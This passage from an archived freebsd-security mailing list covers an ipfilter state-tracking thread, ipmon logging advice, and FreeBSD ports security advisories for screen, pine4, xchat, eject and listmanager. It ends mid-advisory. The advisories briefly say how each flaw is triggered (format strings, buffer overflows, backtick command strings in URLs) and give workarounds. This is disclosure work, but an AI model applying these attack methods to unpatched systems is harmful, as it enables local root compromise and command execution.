> Team Leader, Sun/DEC Team Internet: Cy.Schubert@osg.gov.bc.ca > Open Systems Group, ITSD, ISTA > Province of BC > > > > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message > To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Sep 13 2:17:50 2000 Delivered-To: freebsd-security@freebsd.org Received: from gera.nns.ru (gera.nns.ru [195.230.79.10]) by hub.freebsd.org (Postfix) with ESMTP id 8440A37B423 for ; Wed, 13 Sep 2000 02:17:39 -0700 (PDT) Received: from falcon.nns.ru (falcon.nns.ru [195.230.79.70]) by gera.nns.ru (8.9.3/8.9.3) with ESMTP id NAA72059 for ; Wed, 13 Sep 2000 13:17:29 +0400 (MSD) (envelope-from abc@nns.ru) Received: from localhost (localhost [127.0.0.1]) by falcon.nns.ru (8.9.3/8.9.3) with ESMTP id NAA00483 for ; Wed, 13 Sep 2000 13:17:29 +0400 (MSD) (envelope-from abc@nns.ru) Date: Wed, 13 Sep 2000 13:17:29 +0400 (MSD) From: "Andrey V. Sokolov" X-Sender: abc@localhost To: freebsd-security@freebsd.org Subject: ipf & keep state Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Hello! We have router running under FreeBSD 4.1-RELEASE, with two ethernet cards (ep0 and xl0). We have the WWW-server connected to the router via xl0. The router connected to ISP via ep0. To let everyone visit our WWW we have following ipf rules for ep0: ... block in log quick on ep0 all head 10 pass in quick on ep0 proto tcp from any port > 1023 to A.B.C.D/32 port = 80 flags S keep state group 10 ... But some type of packets are dropped by ipfilter within legal session! router# ipmon ... 13/09/2000 12:34:54.393687 ep0 @0:3 b 137.187.208.52,2854 -> A.B.C.D,80 PR tcp len 20 10240 -AF IN 13/09/2000 12:34:54.393687 ep0 @0:3 b 195.87.8.124,1757 -> A.B.C.D,80 PR tcp len 20 10240 -A IN 13/09/2000 12:34:54.393687 ep0 @0:3 b 147.17.25.152,1854 -> A.B.C.D,80 PR tcp len 20 10240 -AFP IN 13/09/2000 12:34:54.393687 ep0 @0:3 b 195.170.138.112,1456 -> A.B.C.D,80 PR tcp len 20 10240 -R IN 13/09/2000 12:34:54.393687 ep0 @0:3 b 212.187.28.252,3859 -> A.B.C.D,80 PR tcp len 20 10240 -AF IN ... Can anybody tell me how to fix it? IMHO, ipfilter treats the session as finished after passing first FIN+ACK packet in the session, and forgets to pass corresponding ACK and FIN+ACK packets for correct finish of the session. Thanks. Andrey. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Sep 13 3:19:29 2000 Delivered-To: freebsd-security@freebsd.org Received: from cairo.anu.edu.au (cairo.anu.edu.au [150.203.224.11]) by hub.freebsd.org (Postfix) with ESMTP id 2797337B423 for ; Wed, 13 Sep 2000 03:19:25 -0700 (PDT) Received: (from avalon@localhost) by cairo.anu.edu.au (8.9.3/8.9.3) id VAA15136; Wed, 13 Sep 2000 21:15:37 +1100 (EST) From: Darren Reed Message-Id: <200009131015.VAA15136@cairo.anu.edu.au> Subject: Re: ipf & keep state To: abc@nns.ru (Andrey V. Sokolov) Date: Wed, 13 Sep 2000 21:15:37 +1100 (Australia/NSW) Cc: freebsd-security@FreeBSD.ORG In-Reply-To: from "Andrey V. Sokolov" at Sep 13, 2000 01:17:29 PM X-Mailer: ELM [version 2.5 PL1] MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org In some mail from Andrey V. Sokolov, sie said: > > Hello! > We have router running under FreeBSD 4.1-RELEASE, with two ethernet > cards (ep0 and xl0). We have the WWW-server connected to the router > via xl0. The router connected to ISP via ep0. To let everyone visit > our WWW we have following ipf rules for ep0: > ... > block in log quick on ep0 all head 10 > pass in quick on ep0 proto tcp from any port > 1023 to A.B.C.D/32 port > = 80 flags S keep state group 10 > ... > > But some type of packets are dropped by ipfilter within legal session! > > router# ipmon > ... > 13/09/2000 12:34:54.393687 ep0 @0:3 b 137.187.208.52,2854 -> > A.B.C.D,80 PR tcp len 20 10240 -AF IN > 13/09/2000 12:34:54.393687 ep0 @0:3 b 195.87.8.124,1757 -> > A.B.C.D,80 PR tcp len 20 10240 -A IN > 13/09/2000 12:34:54.393687 ep0 @0:3 b 147.17.25.152,1854 -> > A.B.C.D,80 PR tcp len 20 10240 -AFP IN > 13/09/2000 12:34:54.393687 ep0 @0:3 b 195.170.138.112,1456 -> > A.B.C.D,80 PR tcp len 20 10240 -R IN > 13/09/2000 12:34:54.393687 ep0 @0:3 b 212.187.28.252,3859 -> > A.B.C.D,80 PR tcp len 20 10240 -AF IN > ... > > Can anybody tell me how to fix it? > > IMHO, ipfilter treats the session as finished after passing first > FIN+ACK packet in the session, and forgets to pass corresponding ACK > and FIN+ACK packets for correct finish of the session. More than likely it has received an RST from the web server too. You can try adjusting the timeouts using sysctl. Darren To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Sep 13 6: 1:59 2000 Delivered-To: freebsd-security@freebsd.org Received: from gera.nns.ru (gera.nns.ru [195.230.79.10]) by hub.freebsd.org (Postfix) with ESMTP id 2217A37B422 for ; Wed, 13 Sep 2000 06:01:32 -0700 (PDT) Received: from falcon.nns.ru (falcon.nns.ru [195.230.79.70]) by gera.nns.ru (8.9.3/8.9.3) with ESMTP id RAA77124; Wed, 13 Sep 2000 17:01:24 +0400 (MSD) (envelope-from abc@nns.ru) Received: from localhost (localhost [127.0.0.1]) by falcon.nns.ru (8.9.3/8.9.3) with ESMTP id RAA02232; Wed, 13 Sep 2000 17:01:23 +0400 (MSD) (envelope-from abc@nns.ru) Date: Wed, 13 Sep 2000 17:01:23 +0400 (MSD) From: "Andrey V. Sokolov" X-Sender: abc@localhost To: Darren Reed Cc: freebsd-security@FreeBSD.ORG Subject: Re: ipf & keep state In-Reply-To: <200009131015.VAA15136@cairo.anu.edu.au> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Wed, 13 Sep 2000, Darren Reed wrote: >In some mail from Andrey V. Sokolov, sie said: >> >> Hello! >> We have router running under FreeBSD 4.1-RELEASE, with two ethernet >> cards (ep0 and xl0). We have the WWW-server connected to the router >> via xl0. The router connected to ISP via ep0. To let everyone visit >> our WWW we have following ipf rules for ep0: >> ... >> block in log quick on ep0 all head 10 >> pass in quick on ep0 proto tcp from any port > 1023 to A.B.C.D/32 port >> = 80 flags S keep state group 10 >> ... >> >> But some type of packets are dropped by ipfilter within legal session! >> >> router# ipmon >> ... >> 13/09/2000 12:34:54.393687 ep0 @0:3 b 137.187.208.52,2854 -> >> A.B.C.D,80 PR tcp len 20 10240 -AF IN >> 13/09/2000 12:34:54.393687 ep0 @0:3 b 195.87.8.124,1757 -> >> A.B.C.D,80 PR tcp len 20 10240 -A IN >> 13/09/2000 12:34:54.393687 ep0 @0:3 b 147.17.25.152,1854 -> >> A.B.C.D,80 PR tcp len 20 10240 -AFP IN >> 13/09/2000 12:34:54.393687 ep0 @0:3 b 195.170.138.112,1456 -> >> A.B.C.D,80 PR tcp len 20 10240 -R IN >> 13/09/2000 12:34:54.393687 ep0 @0:3 b 212.187.28.252,3859 -> >> A.B.C.D,80 PR tcp len 20 10240 -AF IN >> ... >> >> Can anybody tell me how to fix it? >> >> IMHO, ipfilter treats the session as finished after passing first >> FIN+ACK packet in the session, and forgets to pass corresponding ACK >> and FIN+ACK packets for correct finish of the session. > >More than likely it has received an RST from the web server too. >You can try adjusting the timeouts using sysctl. > >Darren > Thanks for your answer! You are right, ipfilter is receiving lots of RST from my www server. We increased the marked parameter from 1 to 10. The number of RST packets from the www dropped by ipfilter became smaller, but number of dropped FIN+ACK packets from any to the www is still great. May be we can try to change some other parameters? net.inet.ipf.fr_flags: 0 net.inet.ipf.fr_pass: 514 net.inet.ipf.fr_active: 0 net.inet.ipf.fr_tcpidletimeout: 864000 net.inet.ipf.fr_tcpclosewait: 480 net.inet.ipf.fr_tcplastack: 480 net.inet.ipf.fr_tcptimeout: 480 net.inet.ipf.fr_tcpclosed: 10 ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ net.inet.ipf.fr_udptimeout: 240 net.inet.ipf.fr_icmptimeout: 120 net.inet.ipf.fr_defnatage: 1200 net.inet.ipf.fr_ipfrttl: 120 net.inet.ipf.ipl_unreach: 13 net.inet.ipf.fr_running: 1 net.inet.ipf.fr_authsize: 32 net.inet.ipf.fr_authused: 0 net.inet.ipf.fr_defaultauthage: 600 -- Andrey. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Sep 13 9:29: 7 2000 Delivered-To: freebsd-security@freebsd.org Received: from scl-ims.phoenix.com (scl-ims.phoenix.com [134.122.1.73]) by hub.freebsd.org (Postfix) with ESMTP id 1794237B424 for ; Wed, 13 Sep 2000 09:29:06 -0700 (PDT) Received: from allmaui.com (boxster.phoenix.com [134.122.9.179]) by scl-ims.phoenix.com with SMTP (Microsoft Exchange Internet Mail Service Version 5.5.2650.21) id RHR3G75L; Wed, 13 Sep 2000 09:29:00 -0700 Message-ID: <39BF49B9.F5EAFC19@allmaui.com> Date: Wed, 13 Sep 2000 09:32:41 +0000 From: Craig Cowen X-Mailer: Mozilla 4.72 [en] (X11; I; Linux 2.2.12 i386) X-Accept-Language: en MIME-Version: 1.0 To: "freebsd-security@FreeBSD.ORG" Subject: ipf logging Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org I am not clear on how to log ipf. I believe I need to edit my syslog.conf. Can someone please explain. TIA, Craig To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Sep 13 10:23:17 2000 Delivered-To: freebsd-security@freebsd.org Received: from cactus.fi.uba.ar (cactus.fi.uba.ar [157.92.49.108]) by hub.freebsd.org (Postfix) with ESMTP id DE41337B422 for ; Wed, 13 Sep 2000 10:22:51 -0700 (PDT) Received: from cactus.fi.uba.ar (cactus.fi.uba.ar [157.92.49.108]) by cactus.fi.uba.ar (8.9.3/8.9.3) with ESMTP id OAA21051; Wed, 13 Sep 2000 14:17:05 -0300 (ART) (envelope-from fgleiser@cactus.fi.uba.ar) Date: Wed, 13 Sep 2000 14:17:05 -0300 (ART) From: Fernando Gleiser To: Craig Cowen Cc: "freebsd-security@FreeBSD.ORG" Subject: Re: ipf logging In-Reply-To: <39BF49B9.F5EAFC19@allmaui.com> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Wed, 13 Sep 2000, Craig Cowen wrote: > I am not clear on how to log ipf. > I believe I need to edit my syslog.conf. Yes and no. ipmon (ipf's logging process) can log via syslog or directly to a file. If you want to log to a file: # ipmon & If you want to use syslog: # ipmon -s & and you have to add a line like this to syslog.conf: local0.* /var/log/ipf.log > Can someone please explain. > Hope this helps Fer > TIA, > Craig > > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message > To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Sep 13 13:29:47 2000 Delivered-To: freebsd-security@freebsd.org Received: by hub.freebsd.org (Postfix, from userid 758) id D0BFA37B42C; Wed, 13 Sep 2000 13:29:28 -0700 (PDT) From: FreeBSD Security Advisories To: FreeBSD Security Advisories Subject: FreeBSD Ports Security Advisory: FreeBSD-SA-00:46.screen Reply-To: security-advisories@freebsd.org Message-Id: <20000913202928.D0BFA37B42C@hub.freebsd.org> Date: Wed, 13 Sep 2000 13:29:28 -0700 (PDT) Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org -----BEGIN PGP SIGNED MESSAGE----- ============================================================================= FreeBSD-SA-00:46 Security Advisory FreeBSD, Inc. Topic: screen port contains local root compromise Category: ports Module: screen Announced: 2000-09-12 Affects: Ports collection prior to the correction date. Corrected: 2000-09-01 Credits: Jouko Pynnönen Vendor status: Updated version released FreeBSD only: NO I. Background screen is a popular application that multiplexes a physical terminal between several processes. II. Problem Description The screen port, versions 3.9.5 and before, contains a vulnerability which allows local users to gain root privileges. This is accomplished by inserting string-formatting operators into configuration parameters, which may allow arbitrary code to be executed. The screen port is not installed by default, nor is it "part of FreeBSD" as such: it is part of the FreeBSD ports collection, which contains over 3800 third-party applications in a ready-to-install format. The ports collections shipped with FreeBSD 3.5.1 and 4.1 contain this problem since it was discovered after the releases. FreeBSD makes no claim about the security of these third-party applications, although an effort is underway to provide a security audit of the most security-critical ports. III. Impact Local users can obtain root privileges. If you have not chosen to install the screen port/package, then your system is not vulnerable to this problem. IV. Workaround Remove the setuid bit on the program: execute the following command as root: chmod 555 /usr/local/bin/screen-3.9.5 Note that this should be considered a temporary measure and may affect the behaviour of the screen program. V. Solution One of the following: 1) Upgrade your entire ports collection and rebuild the screen port. 2) Deinstall the old package and install a new package dated after the correction date, obtained from: ftp://ftp.FreeBSD.org/pub/FreeBSD/ports/i386/packages-3-stable/misc/screen-3.9.8.tgz ftp://ftp.FreeBSD.org/pub/FreeBSD/ports/i386/packages-4-stable/misc/screen-3.9.8.tgz ftp://ftp.FreeBSD.org/pub/FreeBSD/ports/alpha/packages-4-stable/misc/screen-3.9.8.tgz ftp://ftp.FreeBSD.org/pub/FreeBSD/ports/i386/packages-5-current/misc/screen-3.9.8.tgz ftp://ftp.FreeBSD.org/pub/FreeBSD/ports/alpha/packages-5-current/misc/screen-3.9.8.tgz NOTE: It may be several days before updated packages are available. 3) download a new port skeleton for the screen port from: http://www.freebsd.org/ports/ and use it to rebuild the port. 4) Use the portcheckout utility to automate option (3) above. The portcheckout port is available in /usr/ports/devel/portcheckout or the package can be obtained from: ftp://ftp.FreeBSD.org/pub/FreeBSD/ports/i386/packages-3-stable/devel/portcheckout-2.0.tgz ftp://ftp.FreeBSD.org/pub/FreeBSD/ports/i386/packages-4-stable/devel/portcheckout-2.0.tgz ftp://ftp.FreeBSD.org/pub/FreeBSD/ports/alpha/packages-4-stable/devel/portcheckout-2.0.tgz ftp://ftp.FreeBSD.org/pub/FreeBSD/ports/i386/packages-5-current/devel/portcheckout-2.0.tgz ftp://ftp.FreeBSD.org/pub/FreeBSD/ports/alpha/packages-5-current/devel/portcheckout-2.0.tgz -----BEGIN PGP SIGNATURE----- Version: 2.6.2 iQCVAwUBOb3qBVUuHi5z0oilAQHxTAP/XNdxRQGk2Ei+/Mx8EogmFKyyDPqjLN2B XxQ9Dl4kl5vcYKHy+gwa4vIlns2LetrJZoj7gD0+zQKEsqdm+7ZtqiGXjllvWDAT u76+nJiE2UWSugIZ0c7fvqLYhOR6SUp9cbx6JHDH1jjQneDKjOnHxQ2O04DdA3dz 0M1ywz6lcsk= =odjq -----END PGP SIGNATURE----- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Sep 13 13:34: 7 2000 Delivered-To: freebsd-security@freebsd.org Received: by hub.freebsd.org (Postfix, from userid 758) id E73D837B43C; Wed, 13 Sep 2000 13:33:43 -0700 (PDT) From: FreeBSD Security Advisories To: FreeBSD Security Advisories Subject: FreeBSD Ports Security Advisory: FreeBSD-SA-00:47.pine Reply-To: security-advisories@freebsd.org Message-Id: <20000913203343.E73D837B43C@hub.freebsd.org> Date: Wed, 13 Sep 2000 13:33:43 -0700 (PDT) Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org -----BEGIN PGP SIGNED MESSAGE----- ============================================================================= FreeBSD-SA-00:47 Security Advisory FreeBSD, Inc. Topic: pine4 port allows denial of service Category: ports Module: pine4 Announced: 2000-09-13 Affects: Ports collection. Corrected: 2000-07-17 Credits: Juhapekka Tolvanen Vendor status: Contacted FreeBSD only: NO I. Background Pine is a popular mail user agent. II. Problem Description The pine4 port, versions 4.21 and before, contained a bug which would cause the program to crash when processing a folder which contains an email message with a malformed X-Keywords header. The message itself could be deleted within pine if identified, but other operations such as closing the folder with the message still present would cause the program to crash with no apparent cause, discarding changes to the mailbox. The FreeBSD port of pine4 was changed on 2000-07-17 to use an updated version of the c-client library which is used to handle the mailbox processing. This library does not contain the bug and versions of pine4 built with it (i.e. ports or packages dated after the correction date) do not suffer from this vulnerability. The pine4 port is not installed by default, nor is it "part of FreeBSD" as such: it is part of the FreeBSD ports collection, which contains over 3800 third-party applications in a ready-to-install format. The ports collections shipped with FreeBSD 4.1 and 3.5.1 contain this problem since it was discovered after the releases. FreeBSD makes no claim about the security of these third-party applications, although an effort is underway to provide a security audit of the most security-critical ports. III. Impact Remote users can cause pine4 to crash when closing a mail folder by sending a malformed email. If you have not chosen to install the pine4 port/package, then your system is not vulnerable to this problem. IV. Workaround Deinstall the pine4 port/package, if you have installed it. It may be possible to use a mail filtering utility such as procmail (available in FreeBSD ports as /usr/ports/mail/procmail) to filter out the malformed X-Keywords header from incoming mail, but this solution is not discussed here. V. Solution One of the following: 1) Upgrade your entire ports collection and rebuild the pine4 port. 2) Deinstall the old package and install a new package dated after the correction date, obtained from: ftp://ftp.FreeBSD.org/pub/FreeBSD/ports/i386/packages-3-stable/mail/pine-4.21.tgz ftp://ftp.FreeBSD.org/pub/FreeBSD/ports/i386/packages-4-stable/mail/pine-4.21.tgz ftp://ftp.FreeBSD.org/pub/FreeBSD/ports/alpha/packages-4-stable/mail/pine-4.21.tgz ftp://ftp.FreeBSD.org/pub/FreeBSD/ports/i386/packages-5-current/mail/pine-4.21.tgz ftp://ftp.FreeBSD.org/pub/FreeBSD/ports/alpha/packages-5-current/mail/pine-4.21.tgz NOTE: Be sure to check the file creation date on the package, because the version number of the software has not changed. 3) download a new port skeleton for the listmanager port from: http://www.freebsd.org/ports/ and use it to rebuild the port. 4) Use the portcheckout utility to automate option (3) above. The portcheckout port is available in /usr/ports/devel/portcheckout or the package can be obtained from: ftp://ftp.FreeBSD.org/pub/FreeBSD/ports/i386/packages-3-stable/devel/portcheckout-2.0.tgz ftp://ftp.FreeBSD.org/pub/FreeBSD/ports/i386/packages-4-stable/devel/portcheckout-2.0.tgz ftp://ftp.FreeBSD.org/pub/FreeBSD/ports/alpha/packages-4-stable/devel/portcheckout-2.0.tgz ftp://ftp.FreeBSD.org/pub/FreeBSD/ports/i386/packages-5-current/devel/portcheckout-2.0.tgz ftp://ftp.FreeBSD.org/pub/FreeBSD/ports/alpha/packages-5-current/devel/portcheckout-2.0.tgz -----BEGIN PGP SIGNATURE----- Version: 2.6.2 iQCVAwUBOb/kgFUuHi5z0oilAQEwgAQAnYgLOfvgfM88DLjUXgoZBkVRoroeU8rz 2DXUw4LEQ6ARzruWPepALW2Yls+g5SraDCLHmuTo6tb3vR6kwQ97gQmzNCNDxK9T /5m4EFYo2ErTOB4nO/MqepJ+/0t4oBPByhaRjQBSqQncaN4FIkWgboqfpbYdL6HC cnQSlc+0FPs= =R2n+ -----END PGP SIGNATURE----- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Sep 13 13:34:56 2000 Delivered-To: freebsd-security@freebsd.org Received: by hub.freebsd.org (Postfix, from userid 758) id C464137B43C; Wed, 13 Sep 2000 13:34:34 -0700 (PDT) From: FreeBSD Security Advisories To: FreeBSD Security Advisories Subject: FreeBSD Ports Security Advisory: FreeBSD-SA-00:48.xchat Reply-To: security-advisories@freebsd.org Message-Id: <20000913203434.C464137B43C@hub.freebsd.org> Date: Wed, 13 Sep 2000 13:34:34 -0700 (PDT) Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org -----BEGIN PGP SIGNED MESSAGE----- ============================================================================= FreeBSD-SA-00:48 Security Advisory FreeBSD, Inc. Topic: xchat port inappropriately handles URLs Category: ports Module: xchat, xchat-devel Announced: 2000-09-13 Affects: Ports collection. Corrected: 2000-08-27 Vendor status: Updated version released FreeBSD only: NO I. Background Xchat is a popular graphical IRC client. II. Problem Description The xchat IRC client provides the ability to launch URLs displayed in an IRC window in a web browser by right clicking on the URL. However this was handled incorrectly in versions prior to 1.4.3, and prior to 1.5.7 in the 1.5 development series, and allowed a malicious IRC user to embed command strings in a URL which could cause an arbitrary command to be executed as the local user if the URL were to be "launched" in a browser as described above. The xchat port is not installed by default, nor is it "part of FreeBSD" as such: it is part of the FreeBSD ports collection, which contains over 3800 third-party applications in a ready-to-install format. The ports collections shipped with FreeBSD 4.0 and 3.5.1 contain this problem since it was discovered after the release. FreeBSD makes no claim about the security of these third-party applications, although an effort is underway to provide a security audit of the most security-critical ports. III. Impact Remote IRC users can cause an arbitrary command to be executed by the local user, if they attempt to launch a malformed URL by right clicking on it. If you have not chosen to install the xchat or xchat-devel ports/packages, then your system is not vulnerable to this problem. IV. Workaround Do not attempt to launch URLs which contain the ` (backtick) character. V. Solution One of the following: 1) Upgrade your entire ports collection and rebuild the xchat or xchat-devel port. 2) Deinstall the old package and install a new package dated after the correction date, obtained from: ftp://ftp.FreeBSD.org/pub/FreeBSD/ports/i386/packages-3-stable/irc/xchat-1.4.3.tgz ftp://ftp.FreeBSD.org/pub/FreeBSD/ports/i386/packages-4-stable/irc/xchat-1.4.3.tgz ftp://ftp.FreeBSD.org/pub/FreeBSD/ports/alpha/packages-4-stable/irc/xchat-1.4.3.tgz ftp://ftp.FreeBSD.org/pub/FreeBSD/ports/i386/packages-5-current/irc/xchat-1.4.3.tgz ftp://ftp.FreeBSD.org/pub/FreeBSD/ports/alpha/packages-5-current/irc/xchat-1.4.3.tgz 3) download a new port skeleton for the xchat port from: http://www.freebsd.org/ports/ and use it to rebuild the port. 4) Use the portcheckout utility to automate option (3) above. The portcheckout port is available in /usr/ports/devel/portcheckout or the package can be obtained from: ftp://ftp.FreeBSD.org/pub/FreeBSD/ports/i386/packages-3-stable/devel/portcheckout-2.0.tgz ftp://ftp.FreeBSD.org/pub/FreeBSD/ports/i386/packages-4-stable/devel/portcheckout-2.0.tgz ftp://ftp.FreeBSD.org/pub/FreeBSD/ports/alpha/packages-4-stable/devel/portcheckout-2.0.tgz ftp://ftp.FreeBSD.org/pub/FreeBSD/ports/i386/packages-5-current/devel/portcheckout-2.0.tgz ftp://ftp.FreeBSD.org/pub/FreeBSD/ports/alpha/packages-5-current/devel/portcheckout-2.0.tgz -----BEGIN PGP SIGNATURE----- Version: 2.6.2 iQCVAwUBOb/kBlUuHi5z0oilAQEoEgP+Lso/K6rgAVDeWfsfean7fmKVX1ViID0j LUGlnLGohzSRC14W+21NIfChc0yl9gMmJRgkNHRLPkuyQBmdp8iHBsQlejjeq2PH ZqSF6++V3YBqm4H7EgfaNKTk3wn0l/8w+dw3l9iMxmcS8P1oxo4lq04Ufao/N8TS iCWpAmNQI44= =0uMP -----END PGP SIGNATURE----- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Sep 13 13:36:11 2000 Delivered-To: freebsd-security@freebsd.org Received: by hub.freebsd.org (Postfix, from userid 758) id E4D9137B69F; Wed, 13 Sep 2000 13:34:57 -0700 (PDT) From: FreeBSD Security Advisories To: FreeBSD Security Advisories Subject: FreeBSD Ports Security Advisory: FreeBSD-SA-00:49.eject Reply-To: security-advisories@freebsd.org Message-Id: <20000913203457.E4D9137B69F@hub.freebsd.org> Date: Wed, 13 Sep 2000 13:34:57 -0700 (PDT) Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org -----BEGIN PGP SIGNED MESSAGE----- ============================================================================= FreeBSD-SA-00:49 Security Advisory FreeBSD, Inc. Topic: eject port allows local root exploit Category: ports Module: eject Announced: 2000-09-13 Affects: Ports collection. Corrected: 2000-08-21 Credits: Discovered during internal auditing Vendor status: Contacted FreeBSD only: NO I. Background Eject is a utility for ejecting the media from a CD or optical disk drive. II. Problem Description The eject program is installed setuid root, and contains several exploitable buffers which can be overflowed by local users, yielding root privileges. The eject port is not installed by default, nor is it "part of FreeBSD" as such: it is part of the FreeBSD ports collection, which contains over 3800 third-party applications in a ready-to-install format. The ports collections shipped with FreeBSD 4.1 and 3.5.1 contain this problem since it was discovered after the releases. FreeBSD makes no claim about the security of these third-party applications, although an effort is underway to provide a security audit of the most security-critical ports. III. Impact Unprivileged users can obtain root privileges on the local system. If you have not chosen to install the eject port/package, then your system is not vulnerable to this problem. IV. Workaround Deinstall the eject port/package, if you have installed it, or limit the file permissions on the /usr/local/sbin/eject file (e.g. remove setuid permission, or limit it to a trusted group) V. Solution One of the following: 1) Upgrade your entire ports collection and rebuild the eject port. 2) Deinstall the old package and install a new package dated after the correction date, obtained from: ftp://ftp.FreeBSD.org/pub/FreeBSD/ports/i386/packages-3-stable/sysutils/eject-1.4.tgz ftp://ftp.FreeBSD.org/pub/FreeBSD/ports/i386/packages-4-stable/sysutils/eject-1.4.tgz ftp://ftp.FreeBSD.org/pub/FreeBSD/ports/alpha/packages-4-stable/sysutils/eject-1.4.tgz ftp://ftp.FreeBSD.org/pub/FreeBSD/ports/i386/packages-5-current/sysutils/eject-1.4.tgz ftp://ftp.FreeBSD.org/pub/FreeBSD/ports/alpha/packages-5-current/sysutils/eject-1.4.tgz NOTE: Be sure to check the file creation date on the package, because the version number of the software has not changed. 3) download a new port skeleton for the eject port from: http://www.freebsd.org/ports/ and use it to rebuild the port. 4) Use the portcheckout utility to automate option (3) above. The portcheckout port is available in /usr/ports/devel/portcheckout or the package can be obtained from: ftp://ftp.FreeBSD.org/pub/FreeBSD/ports/i386/packages-3-stable/devel/portcheckout-2.0.tgz ftp://ftp.FreeBSD.org/pub/FreeBSD/ports/i386/packages-4-stable/devel/portcheckout-2.0.tgz ftp://ftp.FreeBSD.org/pub/FreeBSD/ports/alpha/packages-4-stable/devel/portcheckout-2.0.tgz ftp://ftp.FreeBSD.org/pub/FreeBSD/ports/i386/packages-5-current/devel/portcheckout-2.0.tgz ftp://ftp.FreeBSD.org/pub/FreeBSD/ports/alpha/packages-5-current/devel/portcheckout-2.0.tgz -----BEGIN PGP SIGNATURE----- Version: 2.6.2 iQCVAwUBOb/kCVUuHi5z0oilAQHfygP/d5QizD/ClKWD6MiKke2lspaI4sLTAKAh QpnrJv2nF7tgK5DV+7X8J9f4dtSLippccwCscsvF8GT8d6RleP3dN0KfDRou/W/d BVUgj2SfRNvsacbc8SyiaekT8ylne70WcYT93RrJ7vWbxTRXGEnOkbJD1rgDSksP RLywyeVfI+U= =G4Dr -----END PGP SIGNATURE----- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Sep 13 13:36:37 2000 Delivered-To: freebsd-security@freebsd.org Received: by hub.freebsd.org (Postfix, from userid 758) id 063E137B660; Wed, 13 Sep 2000 13:35:45 -0700 (PDT) From: FreeBSD Security Advisories To: FreeBSD Security Advisories Subject: FreeBSD Ports Security Advisory: FreeBSD-SA-00:50.listmanager Reply-To: security-advisories@freebsd.org Message-Id: <20000913203545.063E137B660@hub.freebsd.org> Date: Wed, 13 Sep 2000 13:35:45 -0700 (PDT) Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org -----BEGIN PGP SIGNED MESSAGE----- ============================================================================= FreeBSD-SA-00:50 Security Advisory FreeBSD, Inc. Topic: listmanager port allows local root compromise Category: ports Module: listmanager Announced: 2000-09-13 Affects: Ports collection. Corrected: 2000-09-08 Credits: Discovered during internal auditing Vendor status: Updated version released. FreeBSD only: NO I. Background Listmanager is a mailing list manager. II. Problem Description The listmanager port, versions prior to 2.105.1, contained several locally exploitable buffer overflow vulnerabilities which could be used to gain root privileges. Since the source code to listmanager is not available, it is difficult to determine whether there are remaining security vulnerabilities, or whether the software was previously exploitable remotely, but we believe the author has made a good faith effort to improve the security of the code. The listmanager port is not installed by default, nor is it "part of FreeBSD" as such: it is part of the FreeBSD ports collection, which contains over 3800 third-party applications in a ready-to-install format. The ports collections shipped with FreeBSD 4.1 and 3.5.1 contain this problem since it was discovered after the releases. FreeBSD makes no claim about the security of these third-party applications, although an effort is underway to provide a security audit of the most security-critical ports. III. Impact Unprivileged users can obtain root privileges on the local system. If you have not chosen to install the listmanager port/package, then your system is not vulnerable to this problem. IV. Workaround Deinstall the listmanager port/package, if you have installed it. V. Solution One of the following: 1) Upgrade your entire ports collection and rebuild the listmanager port. 2) Deinstall the old package and install a new package dated after the correction date, obtained from: ftp://ftp.FreeBSD.org/pub/FreeBSD/ports/i386/packages-3-stable/mail/listmanager-2.105.1.tgz ftp://ftp.FreeBSD.org/pub/FreeBSD/ports/i386/packages-4-stable/mail/listmanager-2.105.1.tgz ftp://ftp.FreeBSD.org/pub/FreeBSD/ports/alpha/packages-4-stable/mail/listmanager-2.105.1.tgz ftp://ftp.FreeBSD.org/pub/FreeBSD/ports/i386/packages-5-current/mail/listmanager-2.105.1.tgz ftp://ftp.FreeBSD.org/pub/FreeBSD/ports/alpha/packages-5-current/mail/listmanager-2.105.1.tgz NOTE: It may be several days before updated packages are available. 3) download a new port skeleton for the listmanager port from: http://www.freebsd.org/ports/ and use it to rebuild the port. 4) Use the 